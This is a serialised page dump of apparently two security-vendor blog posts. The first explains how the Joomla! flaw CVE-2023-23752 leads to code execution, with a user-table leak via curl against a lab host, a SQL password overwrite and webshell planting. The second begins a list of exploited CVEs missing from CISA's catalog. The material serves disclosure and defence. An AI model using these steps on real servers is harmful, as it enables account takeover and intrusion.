15:07:45",[1373,105442,2233],{"class":1397},[1373,105444,105437],{"class":2206},[1373,105446,105447],{"class":1391}," 16:41:04",[1373,105449,2233],{"class":1397},[1373,105451,5557],{"class":2206},[1373,105453,105454],{"class":1397}," |",[1373,105456,105454],{"class":1397},[1373,105458,105459],{"class":2206}," NULL",[1373,105461,105462],{"class":1397}," |",[1373,105464,105465],{"class":2206}," 0",[1373,105467,2233],{"class":1397},[1373,105469,105320],{"class":1397},[1373,105471,105472],{"class":1397}," |",[1373,105474,105475],{"class":2206}," 0",[1373,105477,2233],{"class":1397},[1373,105479,105480],{"class":1397}," |\n",[1373,105482,105483],{"class":1375,"line":4915},[1373,105484,105303],{"class":2206},[1373,105486,105487,105489,105492,105494,105497,105500,105503],{"class":1375,"line":4931},[1373,105488,467],{"class":2206},[1373,105490,105491],{"class":1391}," row",[1373,105493,57301],{"class":1391},[1373,105495,105496],{"class":1391}," set",[1373,105498,105499],{"class":4640}," (0.00 ",[1373,105501,105502],{"class":1391},"sec",[1373,105504,11875],{"class":4640},[1373,105506,105507],{"class":1375,"line":4947},[1373,105508,6520],{"emptyLinePlaceholder":237},[1373,105510,105511,105513,105515,105517,105519,105522,105524,105526,105528,105531,105533,105535,105538,105541],{"class":1375,"line":4952},[1373,105512,48715],{"class":2206},[1373,105514,69588],{"class":4640},[1373,105516,20713],{"class":1391},[1373,105518,105296],{"class":1391},[1373,105520,105521],{"class":1391}," SET",[1373,105523,90288],{"class":1391},[1373,105525,8575],{"class":1391},[1373,105527,4883],{"class":1387},[1373,105529,105530],{"class":1391},"d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199",[1373,105532,183],{"class":1387},[1373,105534,7908],{"class":1391},[1373,105536,105537],{"class":1391}," id=",[1373,105539,105540],{"class":5467},"552",[1373,105542,4912],{"class":1383},[1373,105544,105545,105548,105551,105553,105555,105558,105560,105562],{"class":1375,"line":6776},[1373,105546,105547],{"class":2206},"Query",[1373,105549,105550],{"class":1391}," OK,",[1373,105552,5468],{"class":5467},[1373,105554,105491],{"class":1391},[1373,105556,105557],{"class":1391}," affected",[1373,105559,105499],{"class":4640},[1373,105561,105502],{"class":1391},[1373,105563,11875],{"class":4640},[1373,105565,105566,105569,105572,105574,105577,105579,105582],{"class":1375,"line":6781},[1373,105567,105568],{"class":2206},"Rows",[1373,105570,105571],{"class":1391}," matched:",[1373,105573,5468],{"class":5467},[1373,105575,105576],{"class":1391}," Changed:",[1373,105578,5468],{"class":5467},[1373,105580,105581],{"class":1391}," Warnings:",[1373,105583,86581],{"class":5467},[1373,105585,105586],{"class":1375,"line":7524},[1373,105587,6520],{"emptyLinePlaceholder":237},[1373,105589,105590,105592],{"class":1375,"line":7530},[1373,105591,48715],{"class":2206},[1373,105593,6765],{"class":4640},[18,105595,105596],{},"The attacker can then log into the Joomla! administrative web interface. As the Super User, the attacker has two easy paths to execute arbitrary code.",[1789,105598,105599],{},[25,105600,105601,105606,105607,105610,105611,105614,105615,2230],{},[47,105602,105605],{"href":105603,"rel":105604},"https:\u002F\u002Fbook.hacktricks.xyz\u002Fnetwork-services-pentesting\u002Fpentesting-web\u002Fjoomla",[51],"Modify a template"," to include malicious PHP. The image below demonstrates the addition of a tiny webshell to ",[886,105608,105609],{},"index.php",". This will allow the attacker to execute arbitrary code as the ",[886,105612,105613],{},"www-data"," user by sending requests to the instance’s landing page (e.g. ",[886,105616,105617],{},"curl -k http:\u002F\u002F10.9.49.205\u002F?cmd=whoami",[18,105619,105620],{},[68,105621],{":width":10862,"alt":105622,"src":105623},"Joomla! Webshell in Template Editor","\u002Fblog\u002Fjoomla-for-rce\u002Fjoomla-webshell.png",[1789,105625,105626],{},[25,105627,105628,105629,59],{},"Install a malicious plugin such as ",[47,105630,105633],{"href":105631,"rel":105632},"https:\u002F\u002Fgithub.com\u002Fp0dalirius\u002FJoomla-webshell-plugin",[51],"Joomla-webshell-plugin",[18,105635,105636],{},"Both are viable options. Both are achievable because the MySQL credential leak allows the attacker to take over a Super User account. That isn’t the only way though. CVE-2023-23752 provides a second method for chasing after a Super User account.",[61,105638,105640],{"id":105639},"cve-2023-23752-to-code-execution-2","CVE-2023-23752 to Code Execution #2",[18,105642,105643],{},"Instead of leaking the MySQL credentials, the attacker can leak the Joomla! user database using CVE-2023-23752:",[1354,105645,105647],{"className":31740,"code":105646,"language":2186,"meta":219,"style":219},"curl -v http:\u002F\u002F10.9.49.205\u002Fapi\u002Findex.php\u002Fv1\u002Fusers?public=true\n* Trying 10.9.49.205:80...\n* TCP_NODELAY set\n* Connected to 10.9.49.205 (10.9.49.205) port 80 (#0)\n> GET \u002Fapi\u002Findex.php\u002Fv1\u002Fusers?public=true HTTP\u002F1.1\n> Host: 10.9.49.205\n> User-Agent: curl\u002F7.68.0\n> Accept: *\u002F*\n>\n* Mark bundle as not supporting multiuse\n\u003C HTTP\u002F1.1 200 OK\n\u003C Date: Mon, 20 Mar 2023 16:11:38 GMT\n\u003C Server: Apache\u002F2.4.41 (Ubuntu)\n\u003C x-frame-options: SAMEORIGIN\n\u003C referrer-policy: strict-origin-when-cross-origin\n\u003C cross-origin-opener-policy: same-origin\n\u003C X-Powered-By: JoomlaAPI\u002F1.0\n\u003C Expires: Wed, 17 Aug 2005 00:00:00 GMT\n\u003C Last-Modified: Mon, 20 Mar 2023 16:11:38 GMT\n\u003C Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\n\u003C Pragma: no-cache\n\u003C Content-Length: 418\n\u003C Content-Type: application\u002Fvnd.api+json; charset=utf-8\n\u003C\n* Connection #0 to host 10.9.49.205 left intact\n{\"links\":{\"self\":\"http:\\\u002F\\\u002F10.9.49.205\\\u002Fapi\\\u002Findex.php\\\u002Fv1\\\u002Fusers?public=true\"},\"data\":[{\"type\":\"users\",\"id\":\"552\",\"attributes\":{\"id\":552,\"name\":\"jake\",\"username\":\"albinolobster\",\"email\":\"albinolobster@vulncheck.com\",\"block\":0,\"sendEmail\":1,\"registerDate\":\"2023-03-17 15:07:45\",\"lastvisitDate\":\"2023-03-20 15:35:58\",\"lastResetTime\":null,\"resetCount\":0,\"group_count\":1,\"group_names\":\"Super Users\"}}],\"meta\":{\"total-pages\":1}\n",[886,105648,105649,105660,105666,105672,105682,105695,105701,105707,105719,105723,105729,105735,105742,105752,105758,105764,105770,105776,105782,105789,105805,105811,105818,105832,105836,105845],{"__ignoreMap":219},[1373,105650,105651,105653,105655,105658],{"class":1375,"line":1376},[1373,105652,1557],{"class":2206},[1373,105654,45584],{"class":2209},[1373,105656,105657],{"class":1391}," http:\u002F\u002F10.9.49.205\u002Fapi\u002Findex.php\u002Fv1\u002Fusers?public=",[1373,105659,45801],{"class":7054},[1373,105661,105662,105664],{"class":1375,"line":220},[1373,105663,35613],{"class":1397},[1373,105665,103929],{"class":4640},[1373,105667,105668,105670],{"class":1375,"line":1266},[1373,105669,35613],{"class":1397},[1373,105671,76077],{"class":4640},[1373,105673,105674,105676,105678,105680],{"class":1375,"line":1852},[1373,105675,35613],{"class":1397},[1373,105677,103942],{"class":4640},[1373,105679,103945],{"class":2206},[1373,105681,88981],{"class":4640},[1373,105683,105684,105686,105688,105691,105693],{"class":1375,"line":4692},[1373,105685,5384],{"class":1397},[1373,105687,76097],{"class":2206},[1373,105689,105690],{"class":1391}," \u002Fapi\u002Findex.php\u002Fv1\u002Fusers?public=",[1373,105692,10874],{"class":7054},[1373,105694,35589],{"class":1391},[1373,105696,105697,105699],{"class":1375,"line":4724},[1373,105698,5384],{"class":1397},[1373,105700,103967],{"class":4640},[1373,105702,105703,105705],{"class":1375,"line":4756},[1373,105704,5384],{"class":1397},[1373,105706,35603],{"class":4640},[1373,105708,105709,105711,105713,105715,105717],{"class":1375,"line":4768},[1373,105710,5384],{"class":1397},[1373,105712,35610],{"class":4640},[1373,105714,35613],{"class":1397},[1373,105716,2180],{"class":4640},[1373,105718,35618],{"class":1397},[1373,105720,105721],{"class":1375,"line":4792},[1373,105722,6765],{"class":1397},[1373,105724,105725,105727],{"class":1375,"line":4798},[1373,105726,35613],{"class":1397},[1373,105728,76148],{"class":4640},[1373,105730,105731,105733],{"class":1375,"line":4806},[1373,105732,11852],{"class":1397},[1373,105734,89055],{"class":4640},[1373,105736,105737,105739],{"class":1375,"line":4817},[1373,105738,11852],{"class":1397},[1373,105740,105741],{"class":4640}," Date: Mon, 20 Mar 2023 16:11:38 GMT\n",[1373,105743,105744,105746,105748,105750],{"class":1375,"line":4825},[1373,105745,11852],{"class":1397},[1373,105747,104015],{"class":4640},[1373,105749,104018],{"class":2206},[1373,105751,11875],{"class":4640},[1373,105753,105754,105756],{"class":1375,"line":4835},[1373,105755,11852],{"class":1397},[1373,105757,104027],{"class":4640},[1373,105759,105760,105762],{"class":1375,"line":4843},[1373,105761,11852],{"class":1397},[1373,105763,104034],{"class":4640},[1373,105765,105766,105768],{"class":1375,"line":4849},[1373,105767,11852],{"class":1397},[1373,105769,104041],{"class":4640},[1373,105771,105772,105774],{"class":1375,"line":4877},[1373,105773,11852],{"class":1397},[1373,105775,104048],{"class":4640},[1373,105777,105778,105780],{"class":1375,"line":4915},[1373,105779,11852],{"class":1397},[1373,105781,104055],{"class":4640},[1373,105783,105784,105786],{"class":1375,"line":4931},[1373,105785,11852],{"class":1397},[1373,105787,105788],{"class":4640}," Last-Modified: Mon, 20 Mar 2023 16:11:38 GMT\n",[1373,105790,105791,105793,105795,105797,105799,105801,105803],{"class":1375,"line":4947},[1373,105792,11852],{"class":1397},[1373,105794,104069],{"class":4640},[1373,105796,5417],{"class":1397},[1373,105798,104074],{"class":1391},[1373,105800,104077],{"class":4640},[1373,105802,5417],{"class":1397},[1373,105804,104082],{"class":1391},[1373,105806,105807,105809],{"class":1375,"line":4952},[1373,105808,11852],{"class":1397},[1373,105810,104089],{"class":4640},[1373,105812,105813,105815],{"class":1375,"line":6776},[1373,105814,11852],{"class":1397},[1373,105816,105817],{"class":4640}," Content-Length: 418\n",[1373,105819,105820,105822,105824,105826,105828,105830],{"class":1375,"line":6781},[1373,105821,11852],{"class":1397},[1373,105823,104103],{"class":4640},[1373,105825,39663],{"class":1383},[1373,105827,48986],{"class":4640},[1373,105829,5417],{"class":1397},[1373,105831,104112],{"class":1391},[1373,105833,105834],{"class":1375,"line":7524},[1373,105835,35662],{"class":1397},[1373,105837,105838,105840,105842],{"class":1375,"line":7530},[1373,105839,35613],{"class":1397},[1373,105841,76330],{"class":4640},[1373,105843,105844],{"class":4630},"#0 to host 10.9.49.205 left intact\n",[1373,105846,105847,105849,105851,105853,105855,105857,105859,105861,105864,105866,105868,105870,105872,105874,105876,105878,105881,105883,105885,105887,105889,105891,105893,105895,105897,105900,105902,105904,105907,105909,105911,105913,105916,105918,105921,105923,105926,105928,105930,105932,105935,105937,105940,105942,105945,105947,105949,105951,105953,105956,105958,105960,105962,105965,105968,105970,105972,105974,105977,105979,105982,105984,105987,105989,105992,105994,105997,105999,106001,106003,106006,106008,106010,106012,106015,106018,106020,106023,106025,106027,106029,106031,106033,106035,106037],{"class":1375,"line":7546},[1373,105848,9149],{"class":1383},[1373,105850,104123],{"class":2206},[1373,105852,4606],{"class":1379},[1373,105854,9149],{"class":1391},[1373,105856,183],{"class":4640},[1373,105858,76212],{"class":2206},[1373,105860,104134],{"class":2206},[1373,105862,105863],{"class":2206},"http:\\\u002F\\\u002F10.9.49.205\\\u002Fapi\\\u002Findex.php\\\u002Fv1\\\u002Fusers?public",[1373,105865,5417],{"class":1391},[1373,105867,10874],{"class":1379},[1373,105869,104198],{"class":2206},[1373,105871,9156],{"class":2206},[1373,105873,104203],{"class":2206},[1373,105875,26399],{"class":1379},[1373,105877,104134],{"class":2206},[1373,105879,105880],{"class":2206},"users",[1373,105882,104144],{"class":2206},[1373,105884,26412],{"class":2206},[1373,105886,104134],{"class":2206},[1373,105888,105540],{"class":2206},[1373,105890,104144],{"class":2206},[1373,105892,104224],{"class":2206},[1373,105894,104227],{"class":2206},[1373,105896,26412],{"class":2206},[1373,105898,105899],{"class":2206},"\":552,\"",[1373,105901,30774],{"class":2206},[1373,105903,104134],{"class":2206},[1373,105905,105906],{"class":2206},"jake",[1373,105908,104144],{"class":2206},[1373,105910,4870],{"class":2206},[1373,105912,104134],{"class":2206},[1373,105914,105915],{"class":2206},"albinolobster",[1373,105917,104144],{"class":2206},[1373,105919,105920],{"class":2206},"email",[1373,105922,104134],{"class":2206},[1373,105924,105925],{"class":2206},"albinolobster@vulncheck.com",[1373,105927,104144],{"class":2206},[1373,105929,10876],{"class":2206},[1373,105931,105037],{"class":2206},[1373,105933,105934],{"class":2206},"sendEmail",[1373,105936,104722],{"class":2206},[1373,105938,105939],{"class":2206},"registerDate",[1373,105941,104134],{"class":2206},[1373,105943,105944],{"class":2206},"2023-03-17",[1373,105946,105440],{"class":1391},[1373,105948,183],{"class":1387},[1373,105950,5437],{"class":1391},[1373,105952,183],{"class":1387},[1373,105954,105955],{"class":1391},"lastvisitDate",[1373,105957,183],{"class":1387},[1373,105959,4606],{"class":1391},[1373,105961,183],{"class":1387},[1373,105963,105964],{"class":1391},"2023-03-20",[1373,105966,105967],{"class":1391}," 15:35:58",[1373,105969,183],{"class":1387},[1373,105971,5437],{"class":1391},[1373,105973,183],{"class":1387},[1373,105975,105976],{"class":1391},"lastResetTime",[1373,105978,183],{"class":1387},[1373,105980,105981],{"class":1391},":null,",[1373,105983,183],{"class":1387},[1373,105985,105986],{"class":1391},"resetCount",[1373,105988,183],{"class":1387},[1373,105990,105991],{"class":1391},":0,",[1373,105993,183],{"class":1387},[1373,105995,105996],{"class":1391},"group_count",[1373,105998,183],{"class":1387},[1373,106000,104363],{"class":1391},[1373,106002,183],{"class":1387},[1373,106004,106005],{"class":1391},"group_names",[1373,106007,183],{"class":1387},[1373,106009,4606],{"class":1391},[1373,106011,183],{"class":1387},[1373,106013,106014],{"class":1391},"Super",[1373,106016,106017],{"class":1391}," Users",[1373,106019,183],{"class":1387},[1373,106021,106022],{"class":1391},"}}],",[1373,106024,183],{"class":1387},[1373,106026,48983],{"class":1391},[1373,106028,183],{"class":1387},[1373,106030,8304],{"class":1391},[1373,106032,183],{"class":1387},[1373,106034,105078],{"class":1391},[1373,106036,183],{"class":1387},[1373,106038,106039],{"class":1391},":1}\n",[18,106041,106042,106043,106046,106047,106052],{},"The database output contains usernames, emails, and assigned group (e.g. ",[886,106044,106045],{},"Super Users","). This should be enough for credential stuffing or ",[47,106048,106051],{"href":106049,"rel":106050},"https:\u002F\u002Fgithub.com\u002Fajnik\u002Fjoomla-bruteforce",[51],"brute forcing"," to achieve Super User access. Some bad administrators might even reuse the MySQL password for the Super User account. Either way, this additional leak has the added benefit of not relying on MySQL being reachable. Once Super User access is achieved, the attacker can follow the previously discussed paths to code execution.",[61,106054,1903],{"id":1902},[18,106056,106057,106058,106062],{},"CVE-2023-23752 is an authentication bypass resulting in an information leak on Joomla! Servers. Although rated as a CVSSv3 5.3 (Medium severity) by ",[47,106059,106061],{"href":103801,"rel":106060},[51],"NVD",", this vulnerability could allow an attacker to achieve code execution under the right circumstances. That likely justifies the interest attackers have shown in this vulnerability.",[18,106064,106065],{},"The total number of vulnerable servers was never high and patching has occurred at a good rate. However, anyone using Joomla! Version 4 should probably consider rotating all passwords. Additionally, examining template files for webshells and auditing all installed plugins would be beneficial.",[2901,106067,106068],{},"html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sMLJd, html code.shiki .sMLJd{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sSsL9, html code.shiki .sSsL9{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#FD971F}html pre.shiki code .ss7Ak, html code.shiki .ss7Ak{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#6A737D;--shiki-default-font-style:inherit;--shiki-dark:#6A737D;--shiki-dark-font-style:inherit;--shiki-sepia:#88846F;--shiki-sepia-font-style:inherit}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}",{"title":219,"searchDepth":220,"depth":220,"links":106070},[106071,106072,106073,106074],{"id":103831,"depth":220,"text":103832},{"id":103902,"depth":220,"text":103903},{"id":105639,"depth":220,"text":105640},{"id":1902,"depth":220,"text":1903},"2023-03-23","CVE-2023-23752 is an information leak affecting Joomla! 4.0 - 4.7. How can an attacker use this vulnerability to achieve code execution? How many internet-facing systems are at risk?",{"slug":106078},"joomla-for-rce","\u002Fblog\u002Fjoomla-for-rce",{"title":103782,"description":106076},"blog\u002Fjoomla-for-rce",[242,23275],"i1yy6IGkS6McuqKpVy9M1mQJK39kG46YE6Rq-W42DJ4",{"id":106085,"title":106086,"articles":106087,"authors":106108,"body":106110,"date":106091,"description":107042,"extension":234,"image":7,"link":7,"meta":107043,"navigation":237,"path":107048,"seo":107049,"series":7,"stem":107050,"subtype":7,"tags":107051,"__hash__":107052},"blog\u002Fblog\u002F2022-missing-kev-report.md","The VulnCheck 2022 Exploited Vulnerability Report - Missing CISA KEV Catalog Entries - Blog - VulnCheck Catalog Entries",[106088,106092,106095,106098,106101,106104],{"title":106089,"source":3494,"link":106090,"date":106091},"Risky Biz News: ODNI report highlights China as the US' biggest cyber threat","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-odni-report-highlights?utm_source=substack&utm_medium=email","2023-03-09",{"title":106093,"source":11233,"link":106094,"date":106091},"Nearly 900 flaws listed in CISA vulnerability catalog","https:\u002F\u002Fwww.scmagazine.com\u002Fbrief\u002Fthreat-intelligence\u002Fnearly-900-flaws-listed-in-cisa-vulnerability-catalog",{"title":106096,"source":14378,"link":106097,"date":106091},"Dozens of Exploited Vulnerabilities Missing From CISA ‘Must Patch’ List","https:\u002F\u002Fwww.securityweek.com\u002Fdozens-of-exploited-vulnerabilities-missing-from-cisa-must-patch-list\u002F",{"title":106099,"source":12162,"link":106100,"date":106091},"VulnCheck: CISA's KEV missing 42 vulnerabilities from 2022","https:\u002F\u002Fwww.techtarget.com\u002Fsearchsecurity\u002Fnews\u002F365532199\u002FVulnCheck-CISAs-KEV-missing-42-vulnerabilities-from-2022",{"title":106102,"source":39566,"link":106103,"date":106091},"A wormable PlugX variant. Abusing legitimate services. Compromised webcams. Emotet is back. BlackMamba POC. Hybrid war.","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fdaily-briefing\u002F12\u002F46",{"title":106105,"source":14382,"link":106106,"date":106107},"Alert: Active Exploitation of TP-Link, Apache, and Oracle Vulnerabilities Detected","https:\u002F\u002Fthehackernews.com\u002F2023\u002F05\u002Factive-exploitation-of-tp-link-apache.html","2023-05-02",[106109],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":106111,"toc":107030},[106112,106117,106125,106129,106133,106136,106143,106175,106178,106782,106784,106787,106792,106796,106799,106827,106831,106834,106839,106843,106863,106866,106871,106875,106879,106882,106886,106911,106924,106931,106940,106943,106957,106969,106972,106985,106988,106991,107002,107011,107020,107022,107025],[18,106113,106114],{},[1131,106115,106116],{},"The data in this report was generated on March 2, 2023. Any additions to the CISA KEV Catalog after that date are not reflected in this report.",[18,106118,58229,106119,106124],{},[47,106120,106123],{"href":106121,"rel":106122},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002F2022-cisa-kev-review",[51],"last week’s"," blog, we looked at the vulnerabilities the Cyber Security & Infrastructure Agency (CISA) added to the Known Exploited Vulnerability (KEV) Catalog in 2022. In the report,we mentioned CISA missed some actively exploited vulnerabilities that had been assigned CVEs in 2022. The KEV Catalog is the driving force for vulnerability management in the US federal civilian executive branch, and many private companies have adopted it as the de facto standard. As such, excluding any exploited-in-the-wild vulnerability is a big deal with potentially far-reaching effects. This blog will share 42 likely exploited-in-the-wild vulnerabilities assigned CVEs in 2022 that haven’t been included in the KEV Catalog.",[263,106126],{":list":106127,"ico":266,"title":106128},"[\"VulnCheck identified 42 vulnerabilities that were assigned CVEs in 2022 and reported to have been, or likely to have been, exploited in the wild that were not added to the CISA KEV Catalog.\",\"Of the 42 CVEs, an overwhelming majority are related to botnets (64%). However, there are also a number of ransomware (10%) and threat actor (12%) attributions.\",\"Some missing vulnerabilities, specifically CVE-2016-20016, have been exploited in the wild since 2017 and still have thousands of potential targets online.\",\"76.2% of the missing vulnerabilities were initial access, which VulnCheck recommends prioritizing.\",\"The CISA KEV Catalog is undoubtedly helpful and a driving force in our industry. Still, as long as it’s missing actively exploited vulnerabilities, it cannot be treated as the authoritative catalog of exploited vulnerabilities.\"]","The VulnCheck 2022 Exploited Vulnerability Report - Missing CISA KEV",[61,106130,106132],{"id":106131},"the-missing-vulnerabilities","The Missing Vulnerabilities",[18,106134,106135],{},"Using publicly-available reporting, VulnCheck identified 42 vulnerabilities that were assigned CVEs in 2022 and reported to have been, or likely to have been, exploited in the wild. The exploited-in-the-wild sources include a variety of world-class security organizations, including Talos, ESET Research, Avast, FortiGuard Labs, Rapid7, and more.",[18,106137,106138,106139,106142],{},"The public reporting often tells us ",[1131,106140,106141],{},"who"," was doing the exploitation: ransomware, botnets, threat actors, etc. The “who” is essential, as it can change the criticality of a vulnerability. A vulnerability exploited by ransomware is much more concerning than a vulnerability exploited by a Mirai botnet. VulnCheck breaks down the “who” into four general “attacker-type” categories:",[1789,106144,106145,106157,106164,106172],{},[25,106146,106147,106148,1246,106152,106156],{},"Botnets (e.g. ",[47,106149,24590],{"href":106150,"rel":106151},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Fdetails\u002Felf.mirai",[51],[47,106153,24620],{"href":106154,"rel":106155},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Fdetails\u002Felf.zerobot",[51],", etc.)",[25,106158,106159,106160,2230],{},"Ransomware (e.g ",[47,106161,32702],{"href":106162,"rel":106163},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Fdetails\u002Fwin.clop",[51],[25,106165,106166,106167,2230],{},"Threat Actors (e.g. ",[47,106168,106171],{"href":106169,"rel":106170},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Factor\u002Fapt32",[51],"APT32",[25,106173,106174],{},"Unattributed (a source notes exploitation in the wild but doesn’t provide any attribution information)",[18,106176,106177],{},"The following table contains all 42 vulnerabilities, the reported attacker type, and the publicly-available source indicating likely exploitation in the wild.",[307,106179,106180,106193],{},[310,106181,106182],{},[313,106183,106184,106187,106190],{},[316,106185,106186],{"align":318},"CVE-ID",[316,106188,106189],{"align":318},"VulnCheck Attacker-Type",[316,106191,106192],{"align":318},"Exploited Source",[336,106194,106195,106208,106227,106242,106259,106278,106291,106305,106320,106332,106346,106364,106378,106391,106405,106419,106435,106450,106462,106474,106486,106498,106510,106522,106534,106546,106558,106578,106592,106604,106616,106628,106642,106654,106668,106682,106695,106707,106719,106732,106750,106766],{},[313,106196,106197,106200,106202],{},[341,106198,106199],{"align":318},"CVE-2022-45359",[341,106201,32556],{"align":318},[341,106203,106204],{"align":318},[47,106205,21901],{"href":106206,"rel":106207},"https:\u002F\u002Fwww.wordfence.com\u002Fblog\u002F2022\u002F12\u002Fpsa-yith-woocommerce-gift-cards-premium-plugin-exploited-in-the-wild\u002F",[51],[313,106209,106210,106213,106216],{},[341,106211,106212],{"align":318},"CVE-2022-45045",[341,106214,106215],{"align":318},"Botnet",[341,106217,106218,1246,106222],{"align":318},[47,106219,2709],{"href":106220,"rel":106221},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-45045",[51],[47,106223,106226],{"href":106224,"rel":106225},"https:\u002F\u002Fblog.netlab.360.com\u002Fthe-botnet-cluster-on-185-244-25-0-24-en\u002F",[51],"360 Netlab",[313,106228,106229,106232,106235],{},[341,106230,106231],{"align":318},"CVE-2022-39197",[341,106233,106234],{"align":318},"Threat Actor",[341,106236,106237],{"align":318},[47,106238,106241],{"href":106239,"rel":106240},"https:\u002F\u002Fraw.githubusercontent.com\u002Fblackorbird\u002FAPT_REPORT\u002Fmaster\u002Fsummary\u002F2023\u002F360_APT_Annual_Research_Report_2022.pdf",[51],"360",[313,106243,106244,106247,106249],{},[341,106245,106246],{"align":318},"CVE-2022-37061",[341,106248,106215],{"align":318},[341,106250,106251,1246,106255],{"align":318},[47,106252,106254],{"href":82020,"rel":106253},[51],"FortiGuard Labs",[47,106256,106226],{"href":106257,"rel":106258},"https:\u002F\u002Fblog.netlab.360.com\u002Fnew-ddos-botnet-wszeor\u002F",[51],[313,106260,106261,106264,106266],{},[341,106262,106263],{"align":318},"CVE-2022-35914",[341,106265,32556],{"align":318},[341,106267,106268,1246,106273],{"align":318},[47,106269,106272],{"href":106270,"rel":106271},"https:\u002F\u002Fwww.cert.ssi.gouv.fr\u002Fuploads\u002FCERTFR-2023-CTI-001.pdf",[51],"FR-CERT",[47,106274,106277],{"href":106275,"rel":106276},"https:\u002F\u002Funit42.paloaltonetworks.com\u002Fnetwork-security-trends-aug-oct-2022\u002F",[51],"Unit 42",[313,106279,106280,106283,106285],{},[341,106281,106282],{"align":318},"CVE-2022-35526",[341,106284,106215],{"align":318},[341,106286,106287,106290],{"align":318},[47,106288,106254],{"href":81954,"rel":106289},[51]," (see Unknown 2)",[313,106292,106293,106296,106298],{},[341,106294,106295],{"align":318},"CVE-2022-34721",[341,106297,106234],{"align":318},[341,106299,106300],{"align":318},[47,106301,106304],{"href":106302,"rel":106303},"https:\u002F\u002Fwww.cyfirma.com\u002Fblogs\u002Fwindows-internet-key-exchange-ike-remote-code-execution-vulnerability-analysis\u002F",[51],"CYFIRMA",[313,106306,106307,106310,106312],{},[341,106308,106309],{"align":318},"CVE-2022-34538",[341,106311,106215],{"align":318},[341,106313,106314,1246,106317],{"align":318},[47,106315,106254],{"href":82020,"rel":106316},[51],[47,106318,106226],{"href":106257,"rel":106319},[51],[313,106321,106322,106325,106327],{},[341,106323,106324],{"align":318},"CVE-2022-31499",[341,106326,32556],{"align":318},[341,106328,106329],{"align":318},[47,106330,106277],{"href":106275,"rel":106331},[51],[313,106333,106334,106337,106339],{},[341,106335,106336],{"align":318},"CVE-2022-31199",[341,106338,331],{"align":318},[341,106340,106341],{"align":318},[47,106342,106345],{"href":106343,"rel":106344},"https:\u002F\u002Fblog.talosintelligence.com\u002Fbreaking-the-silence-recent-truebot-activity\u002F",[51],"Talos",[313,106347,106348,106351,106353],{},[341,106349,106350],{"align":318},"CVE-2022-28810",[341,106352,106234],{"align":318},[341,106354,106355,1246,106360],{"align":318},[47,106356,106359],{"href":106357,"rel":106358},"https:\u002F\u002Fwww.welivesecurity.com\u002Fwp-content\u002Fuploads\u002F2022\u002F11\u002Feset_apt_activity_report_t22022.pdf"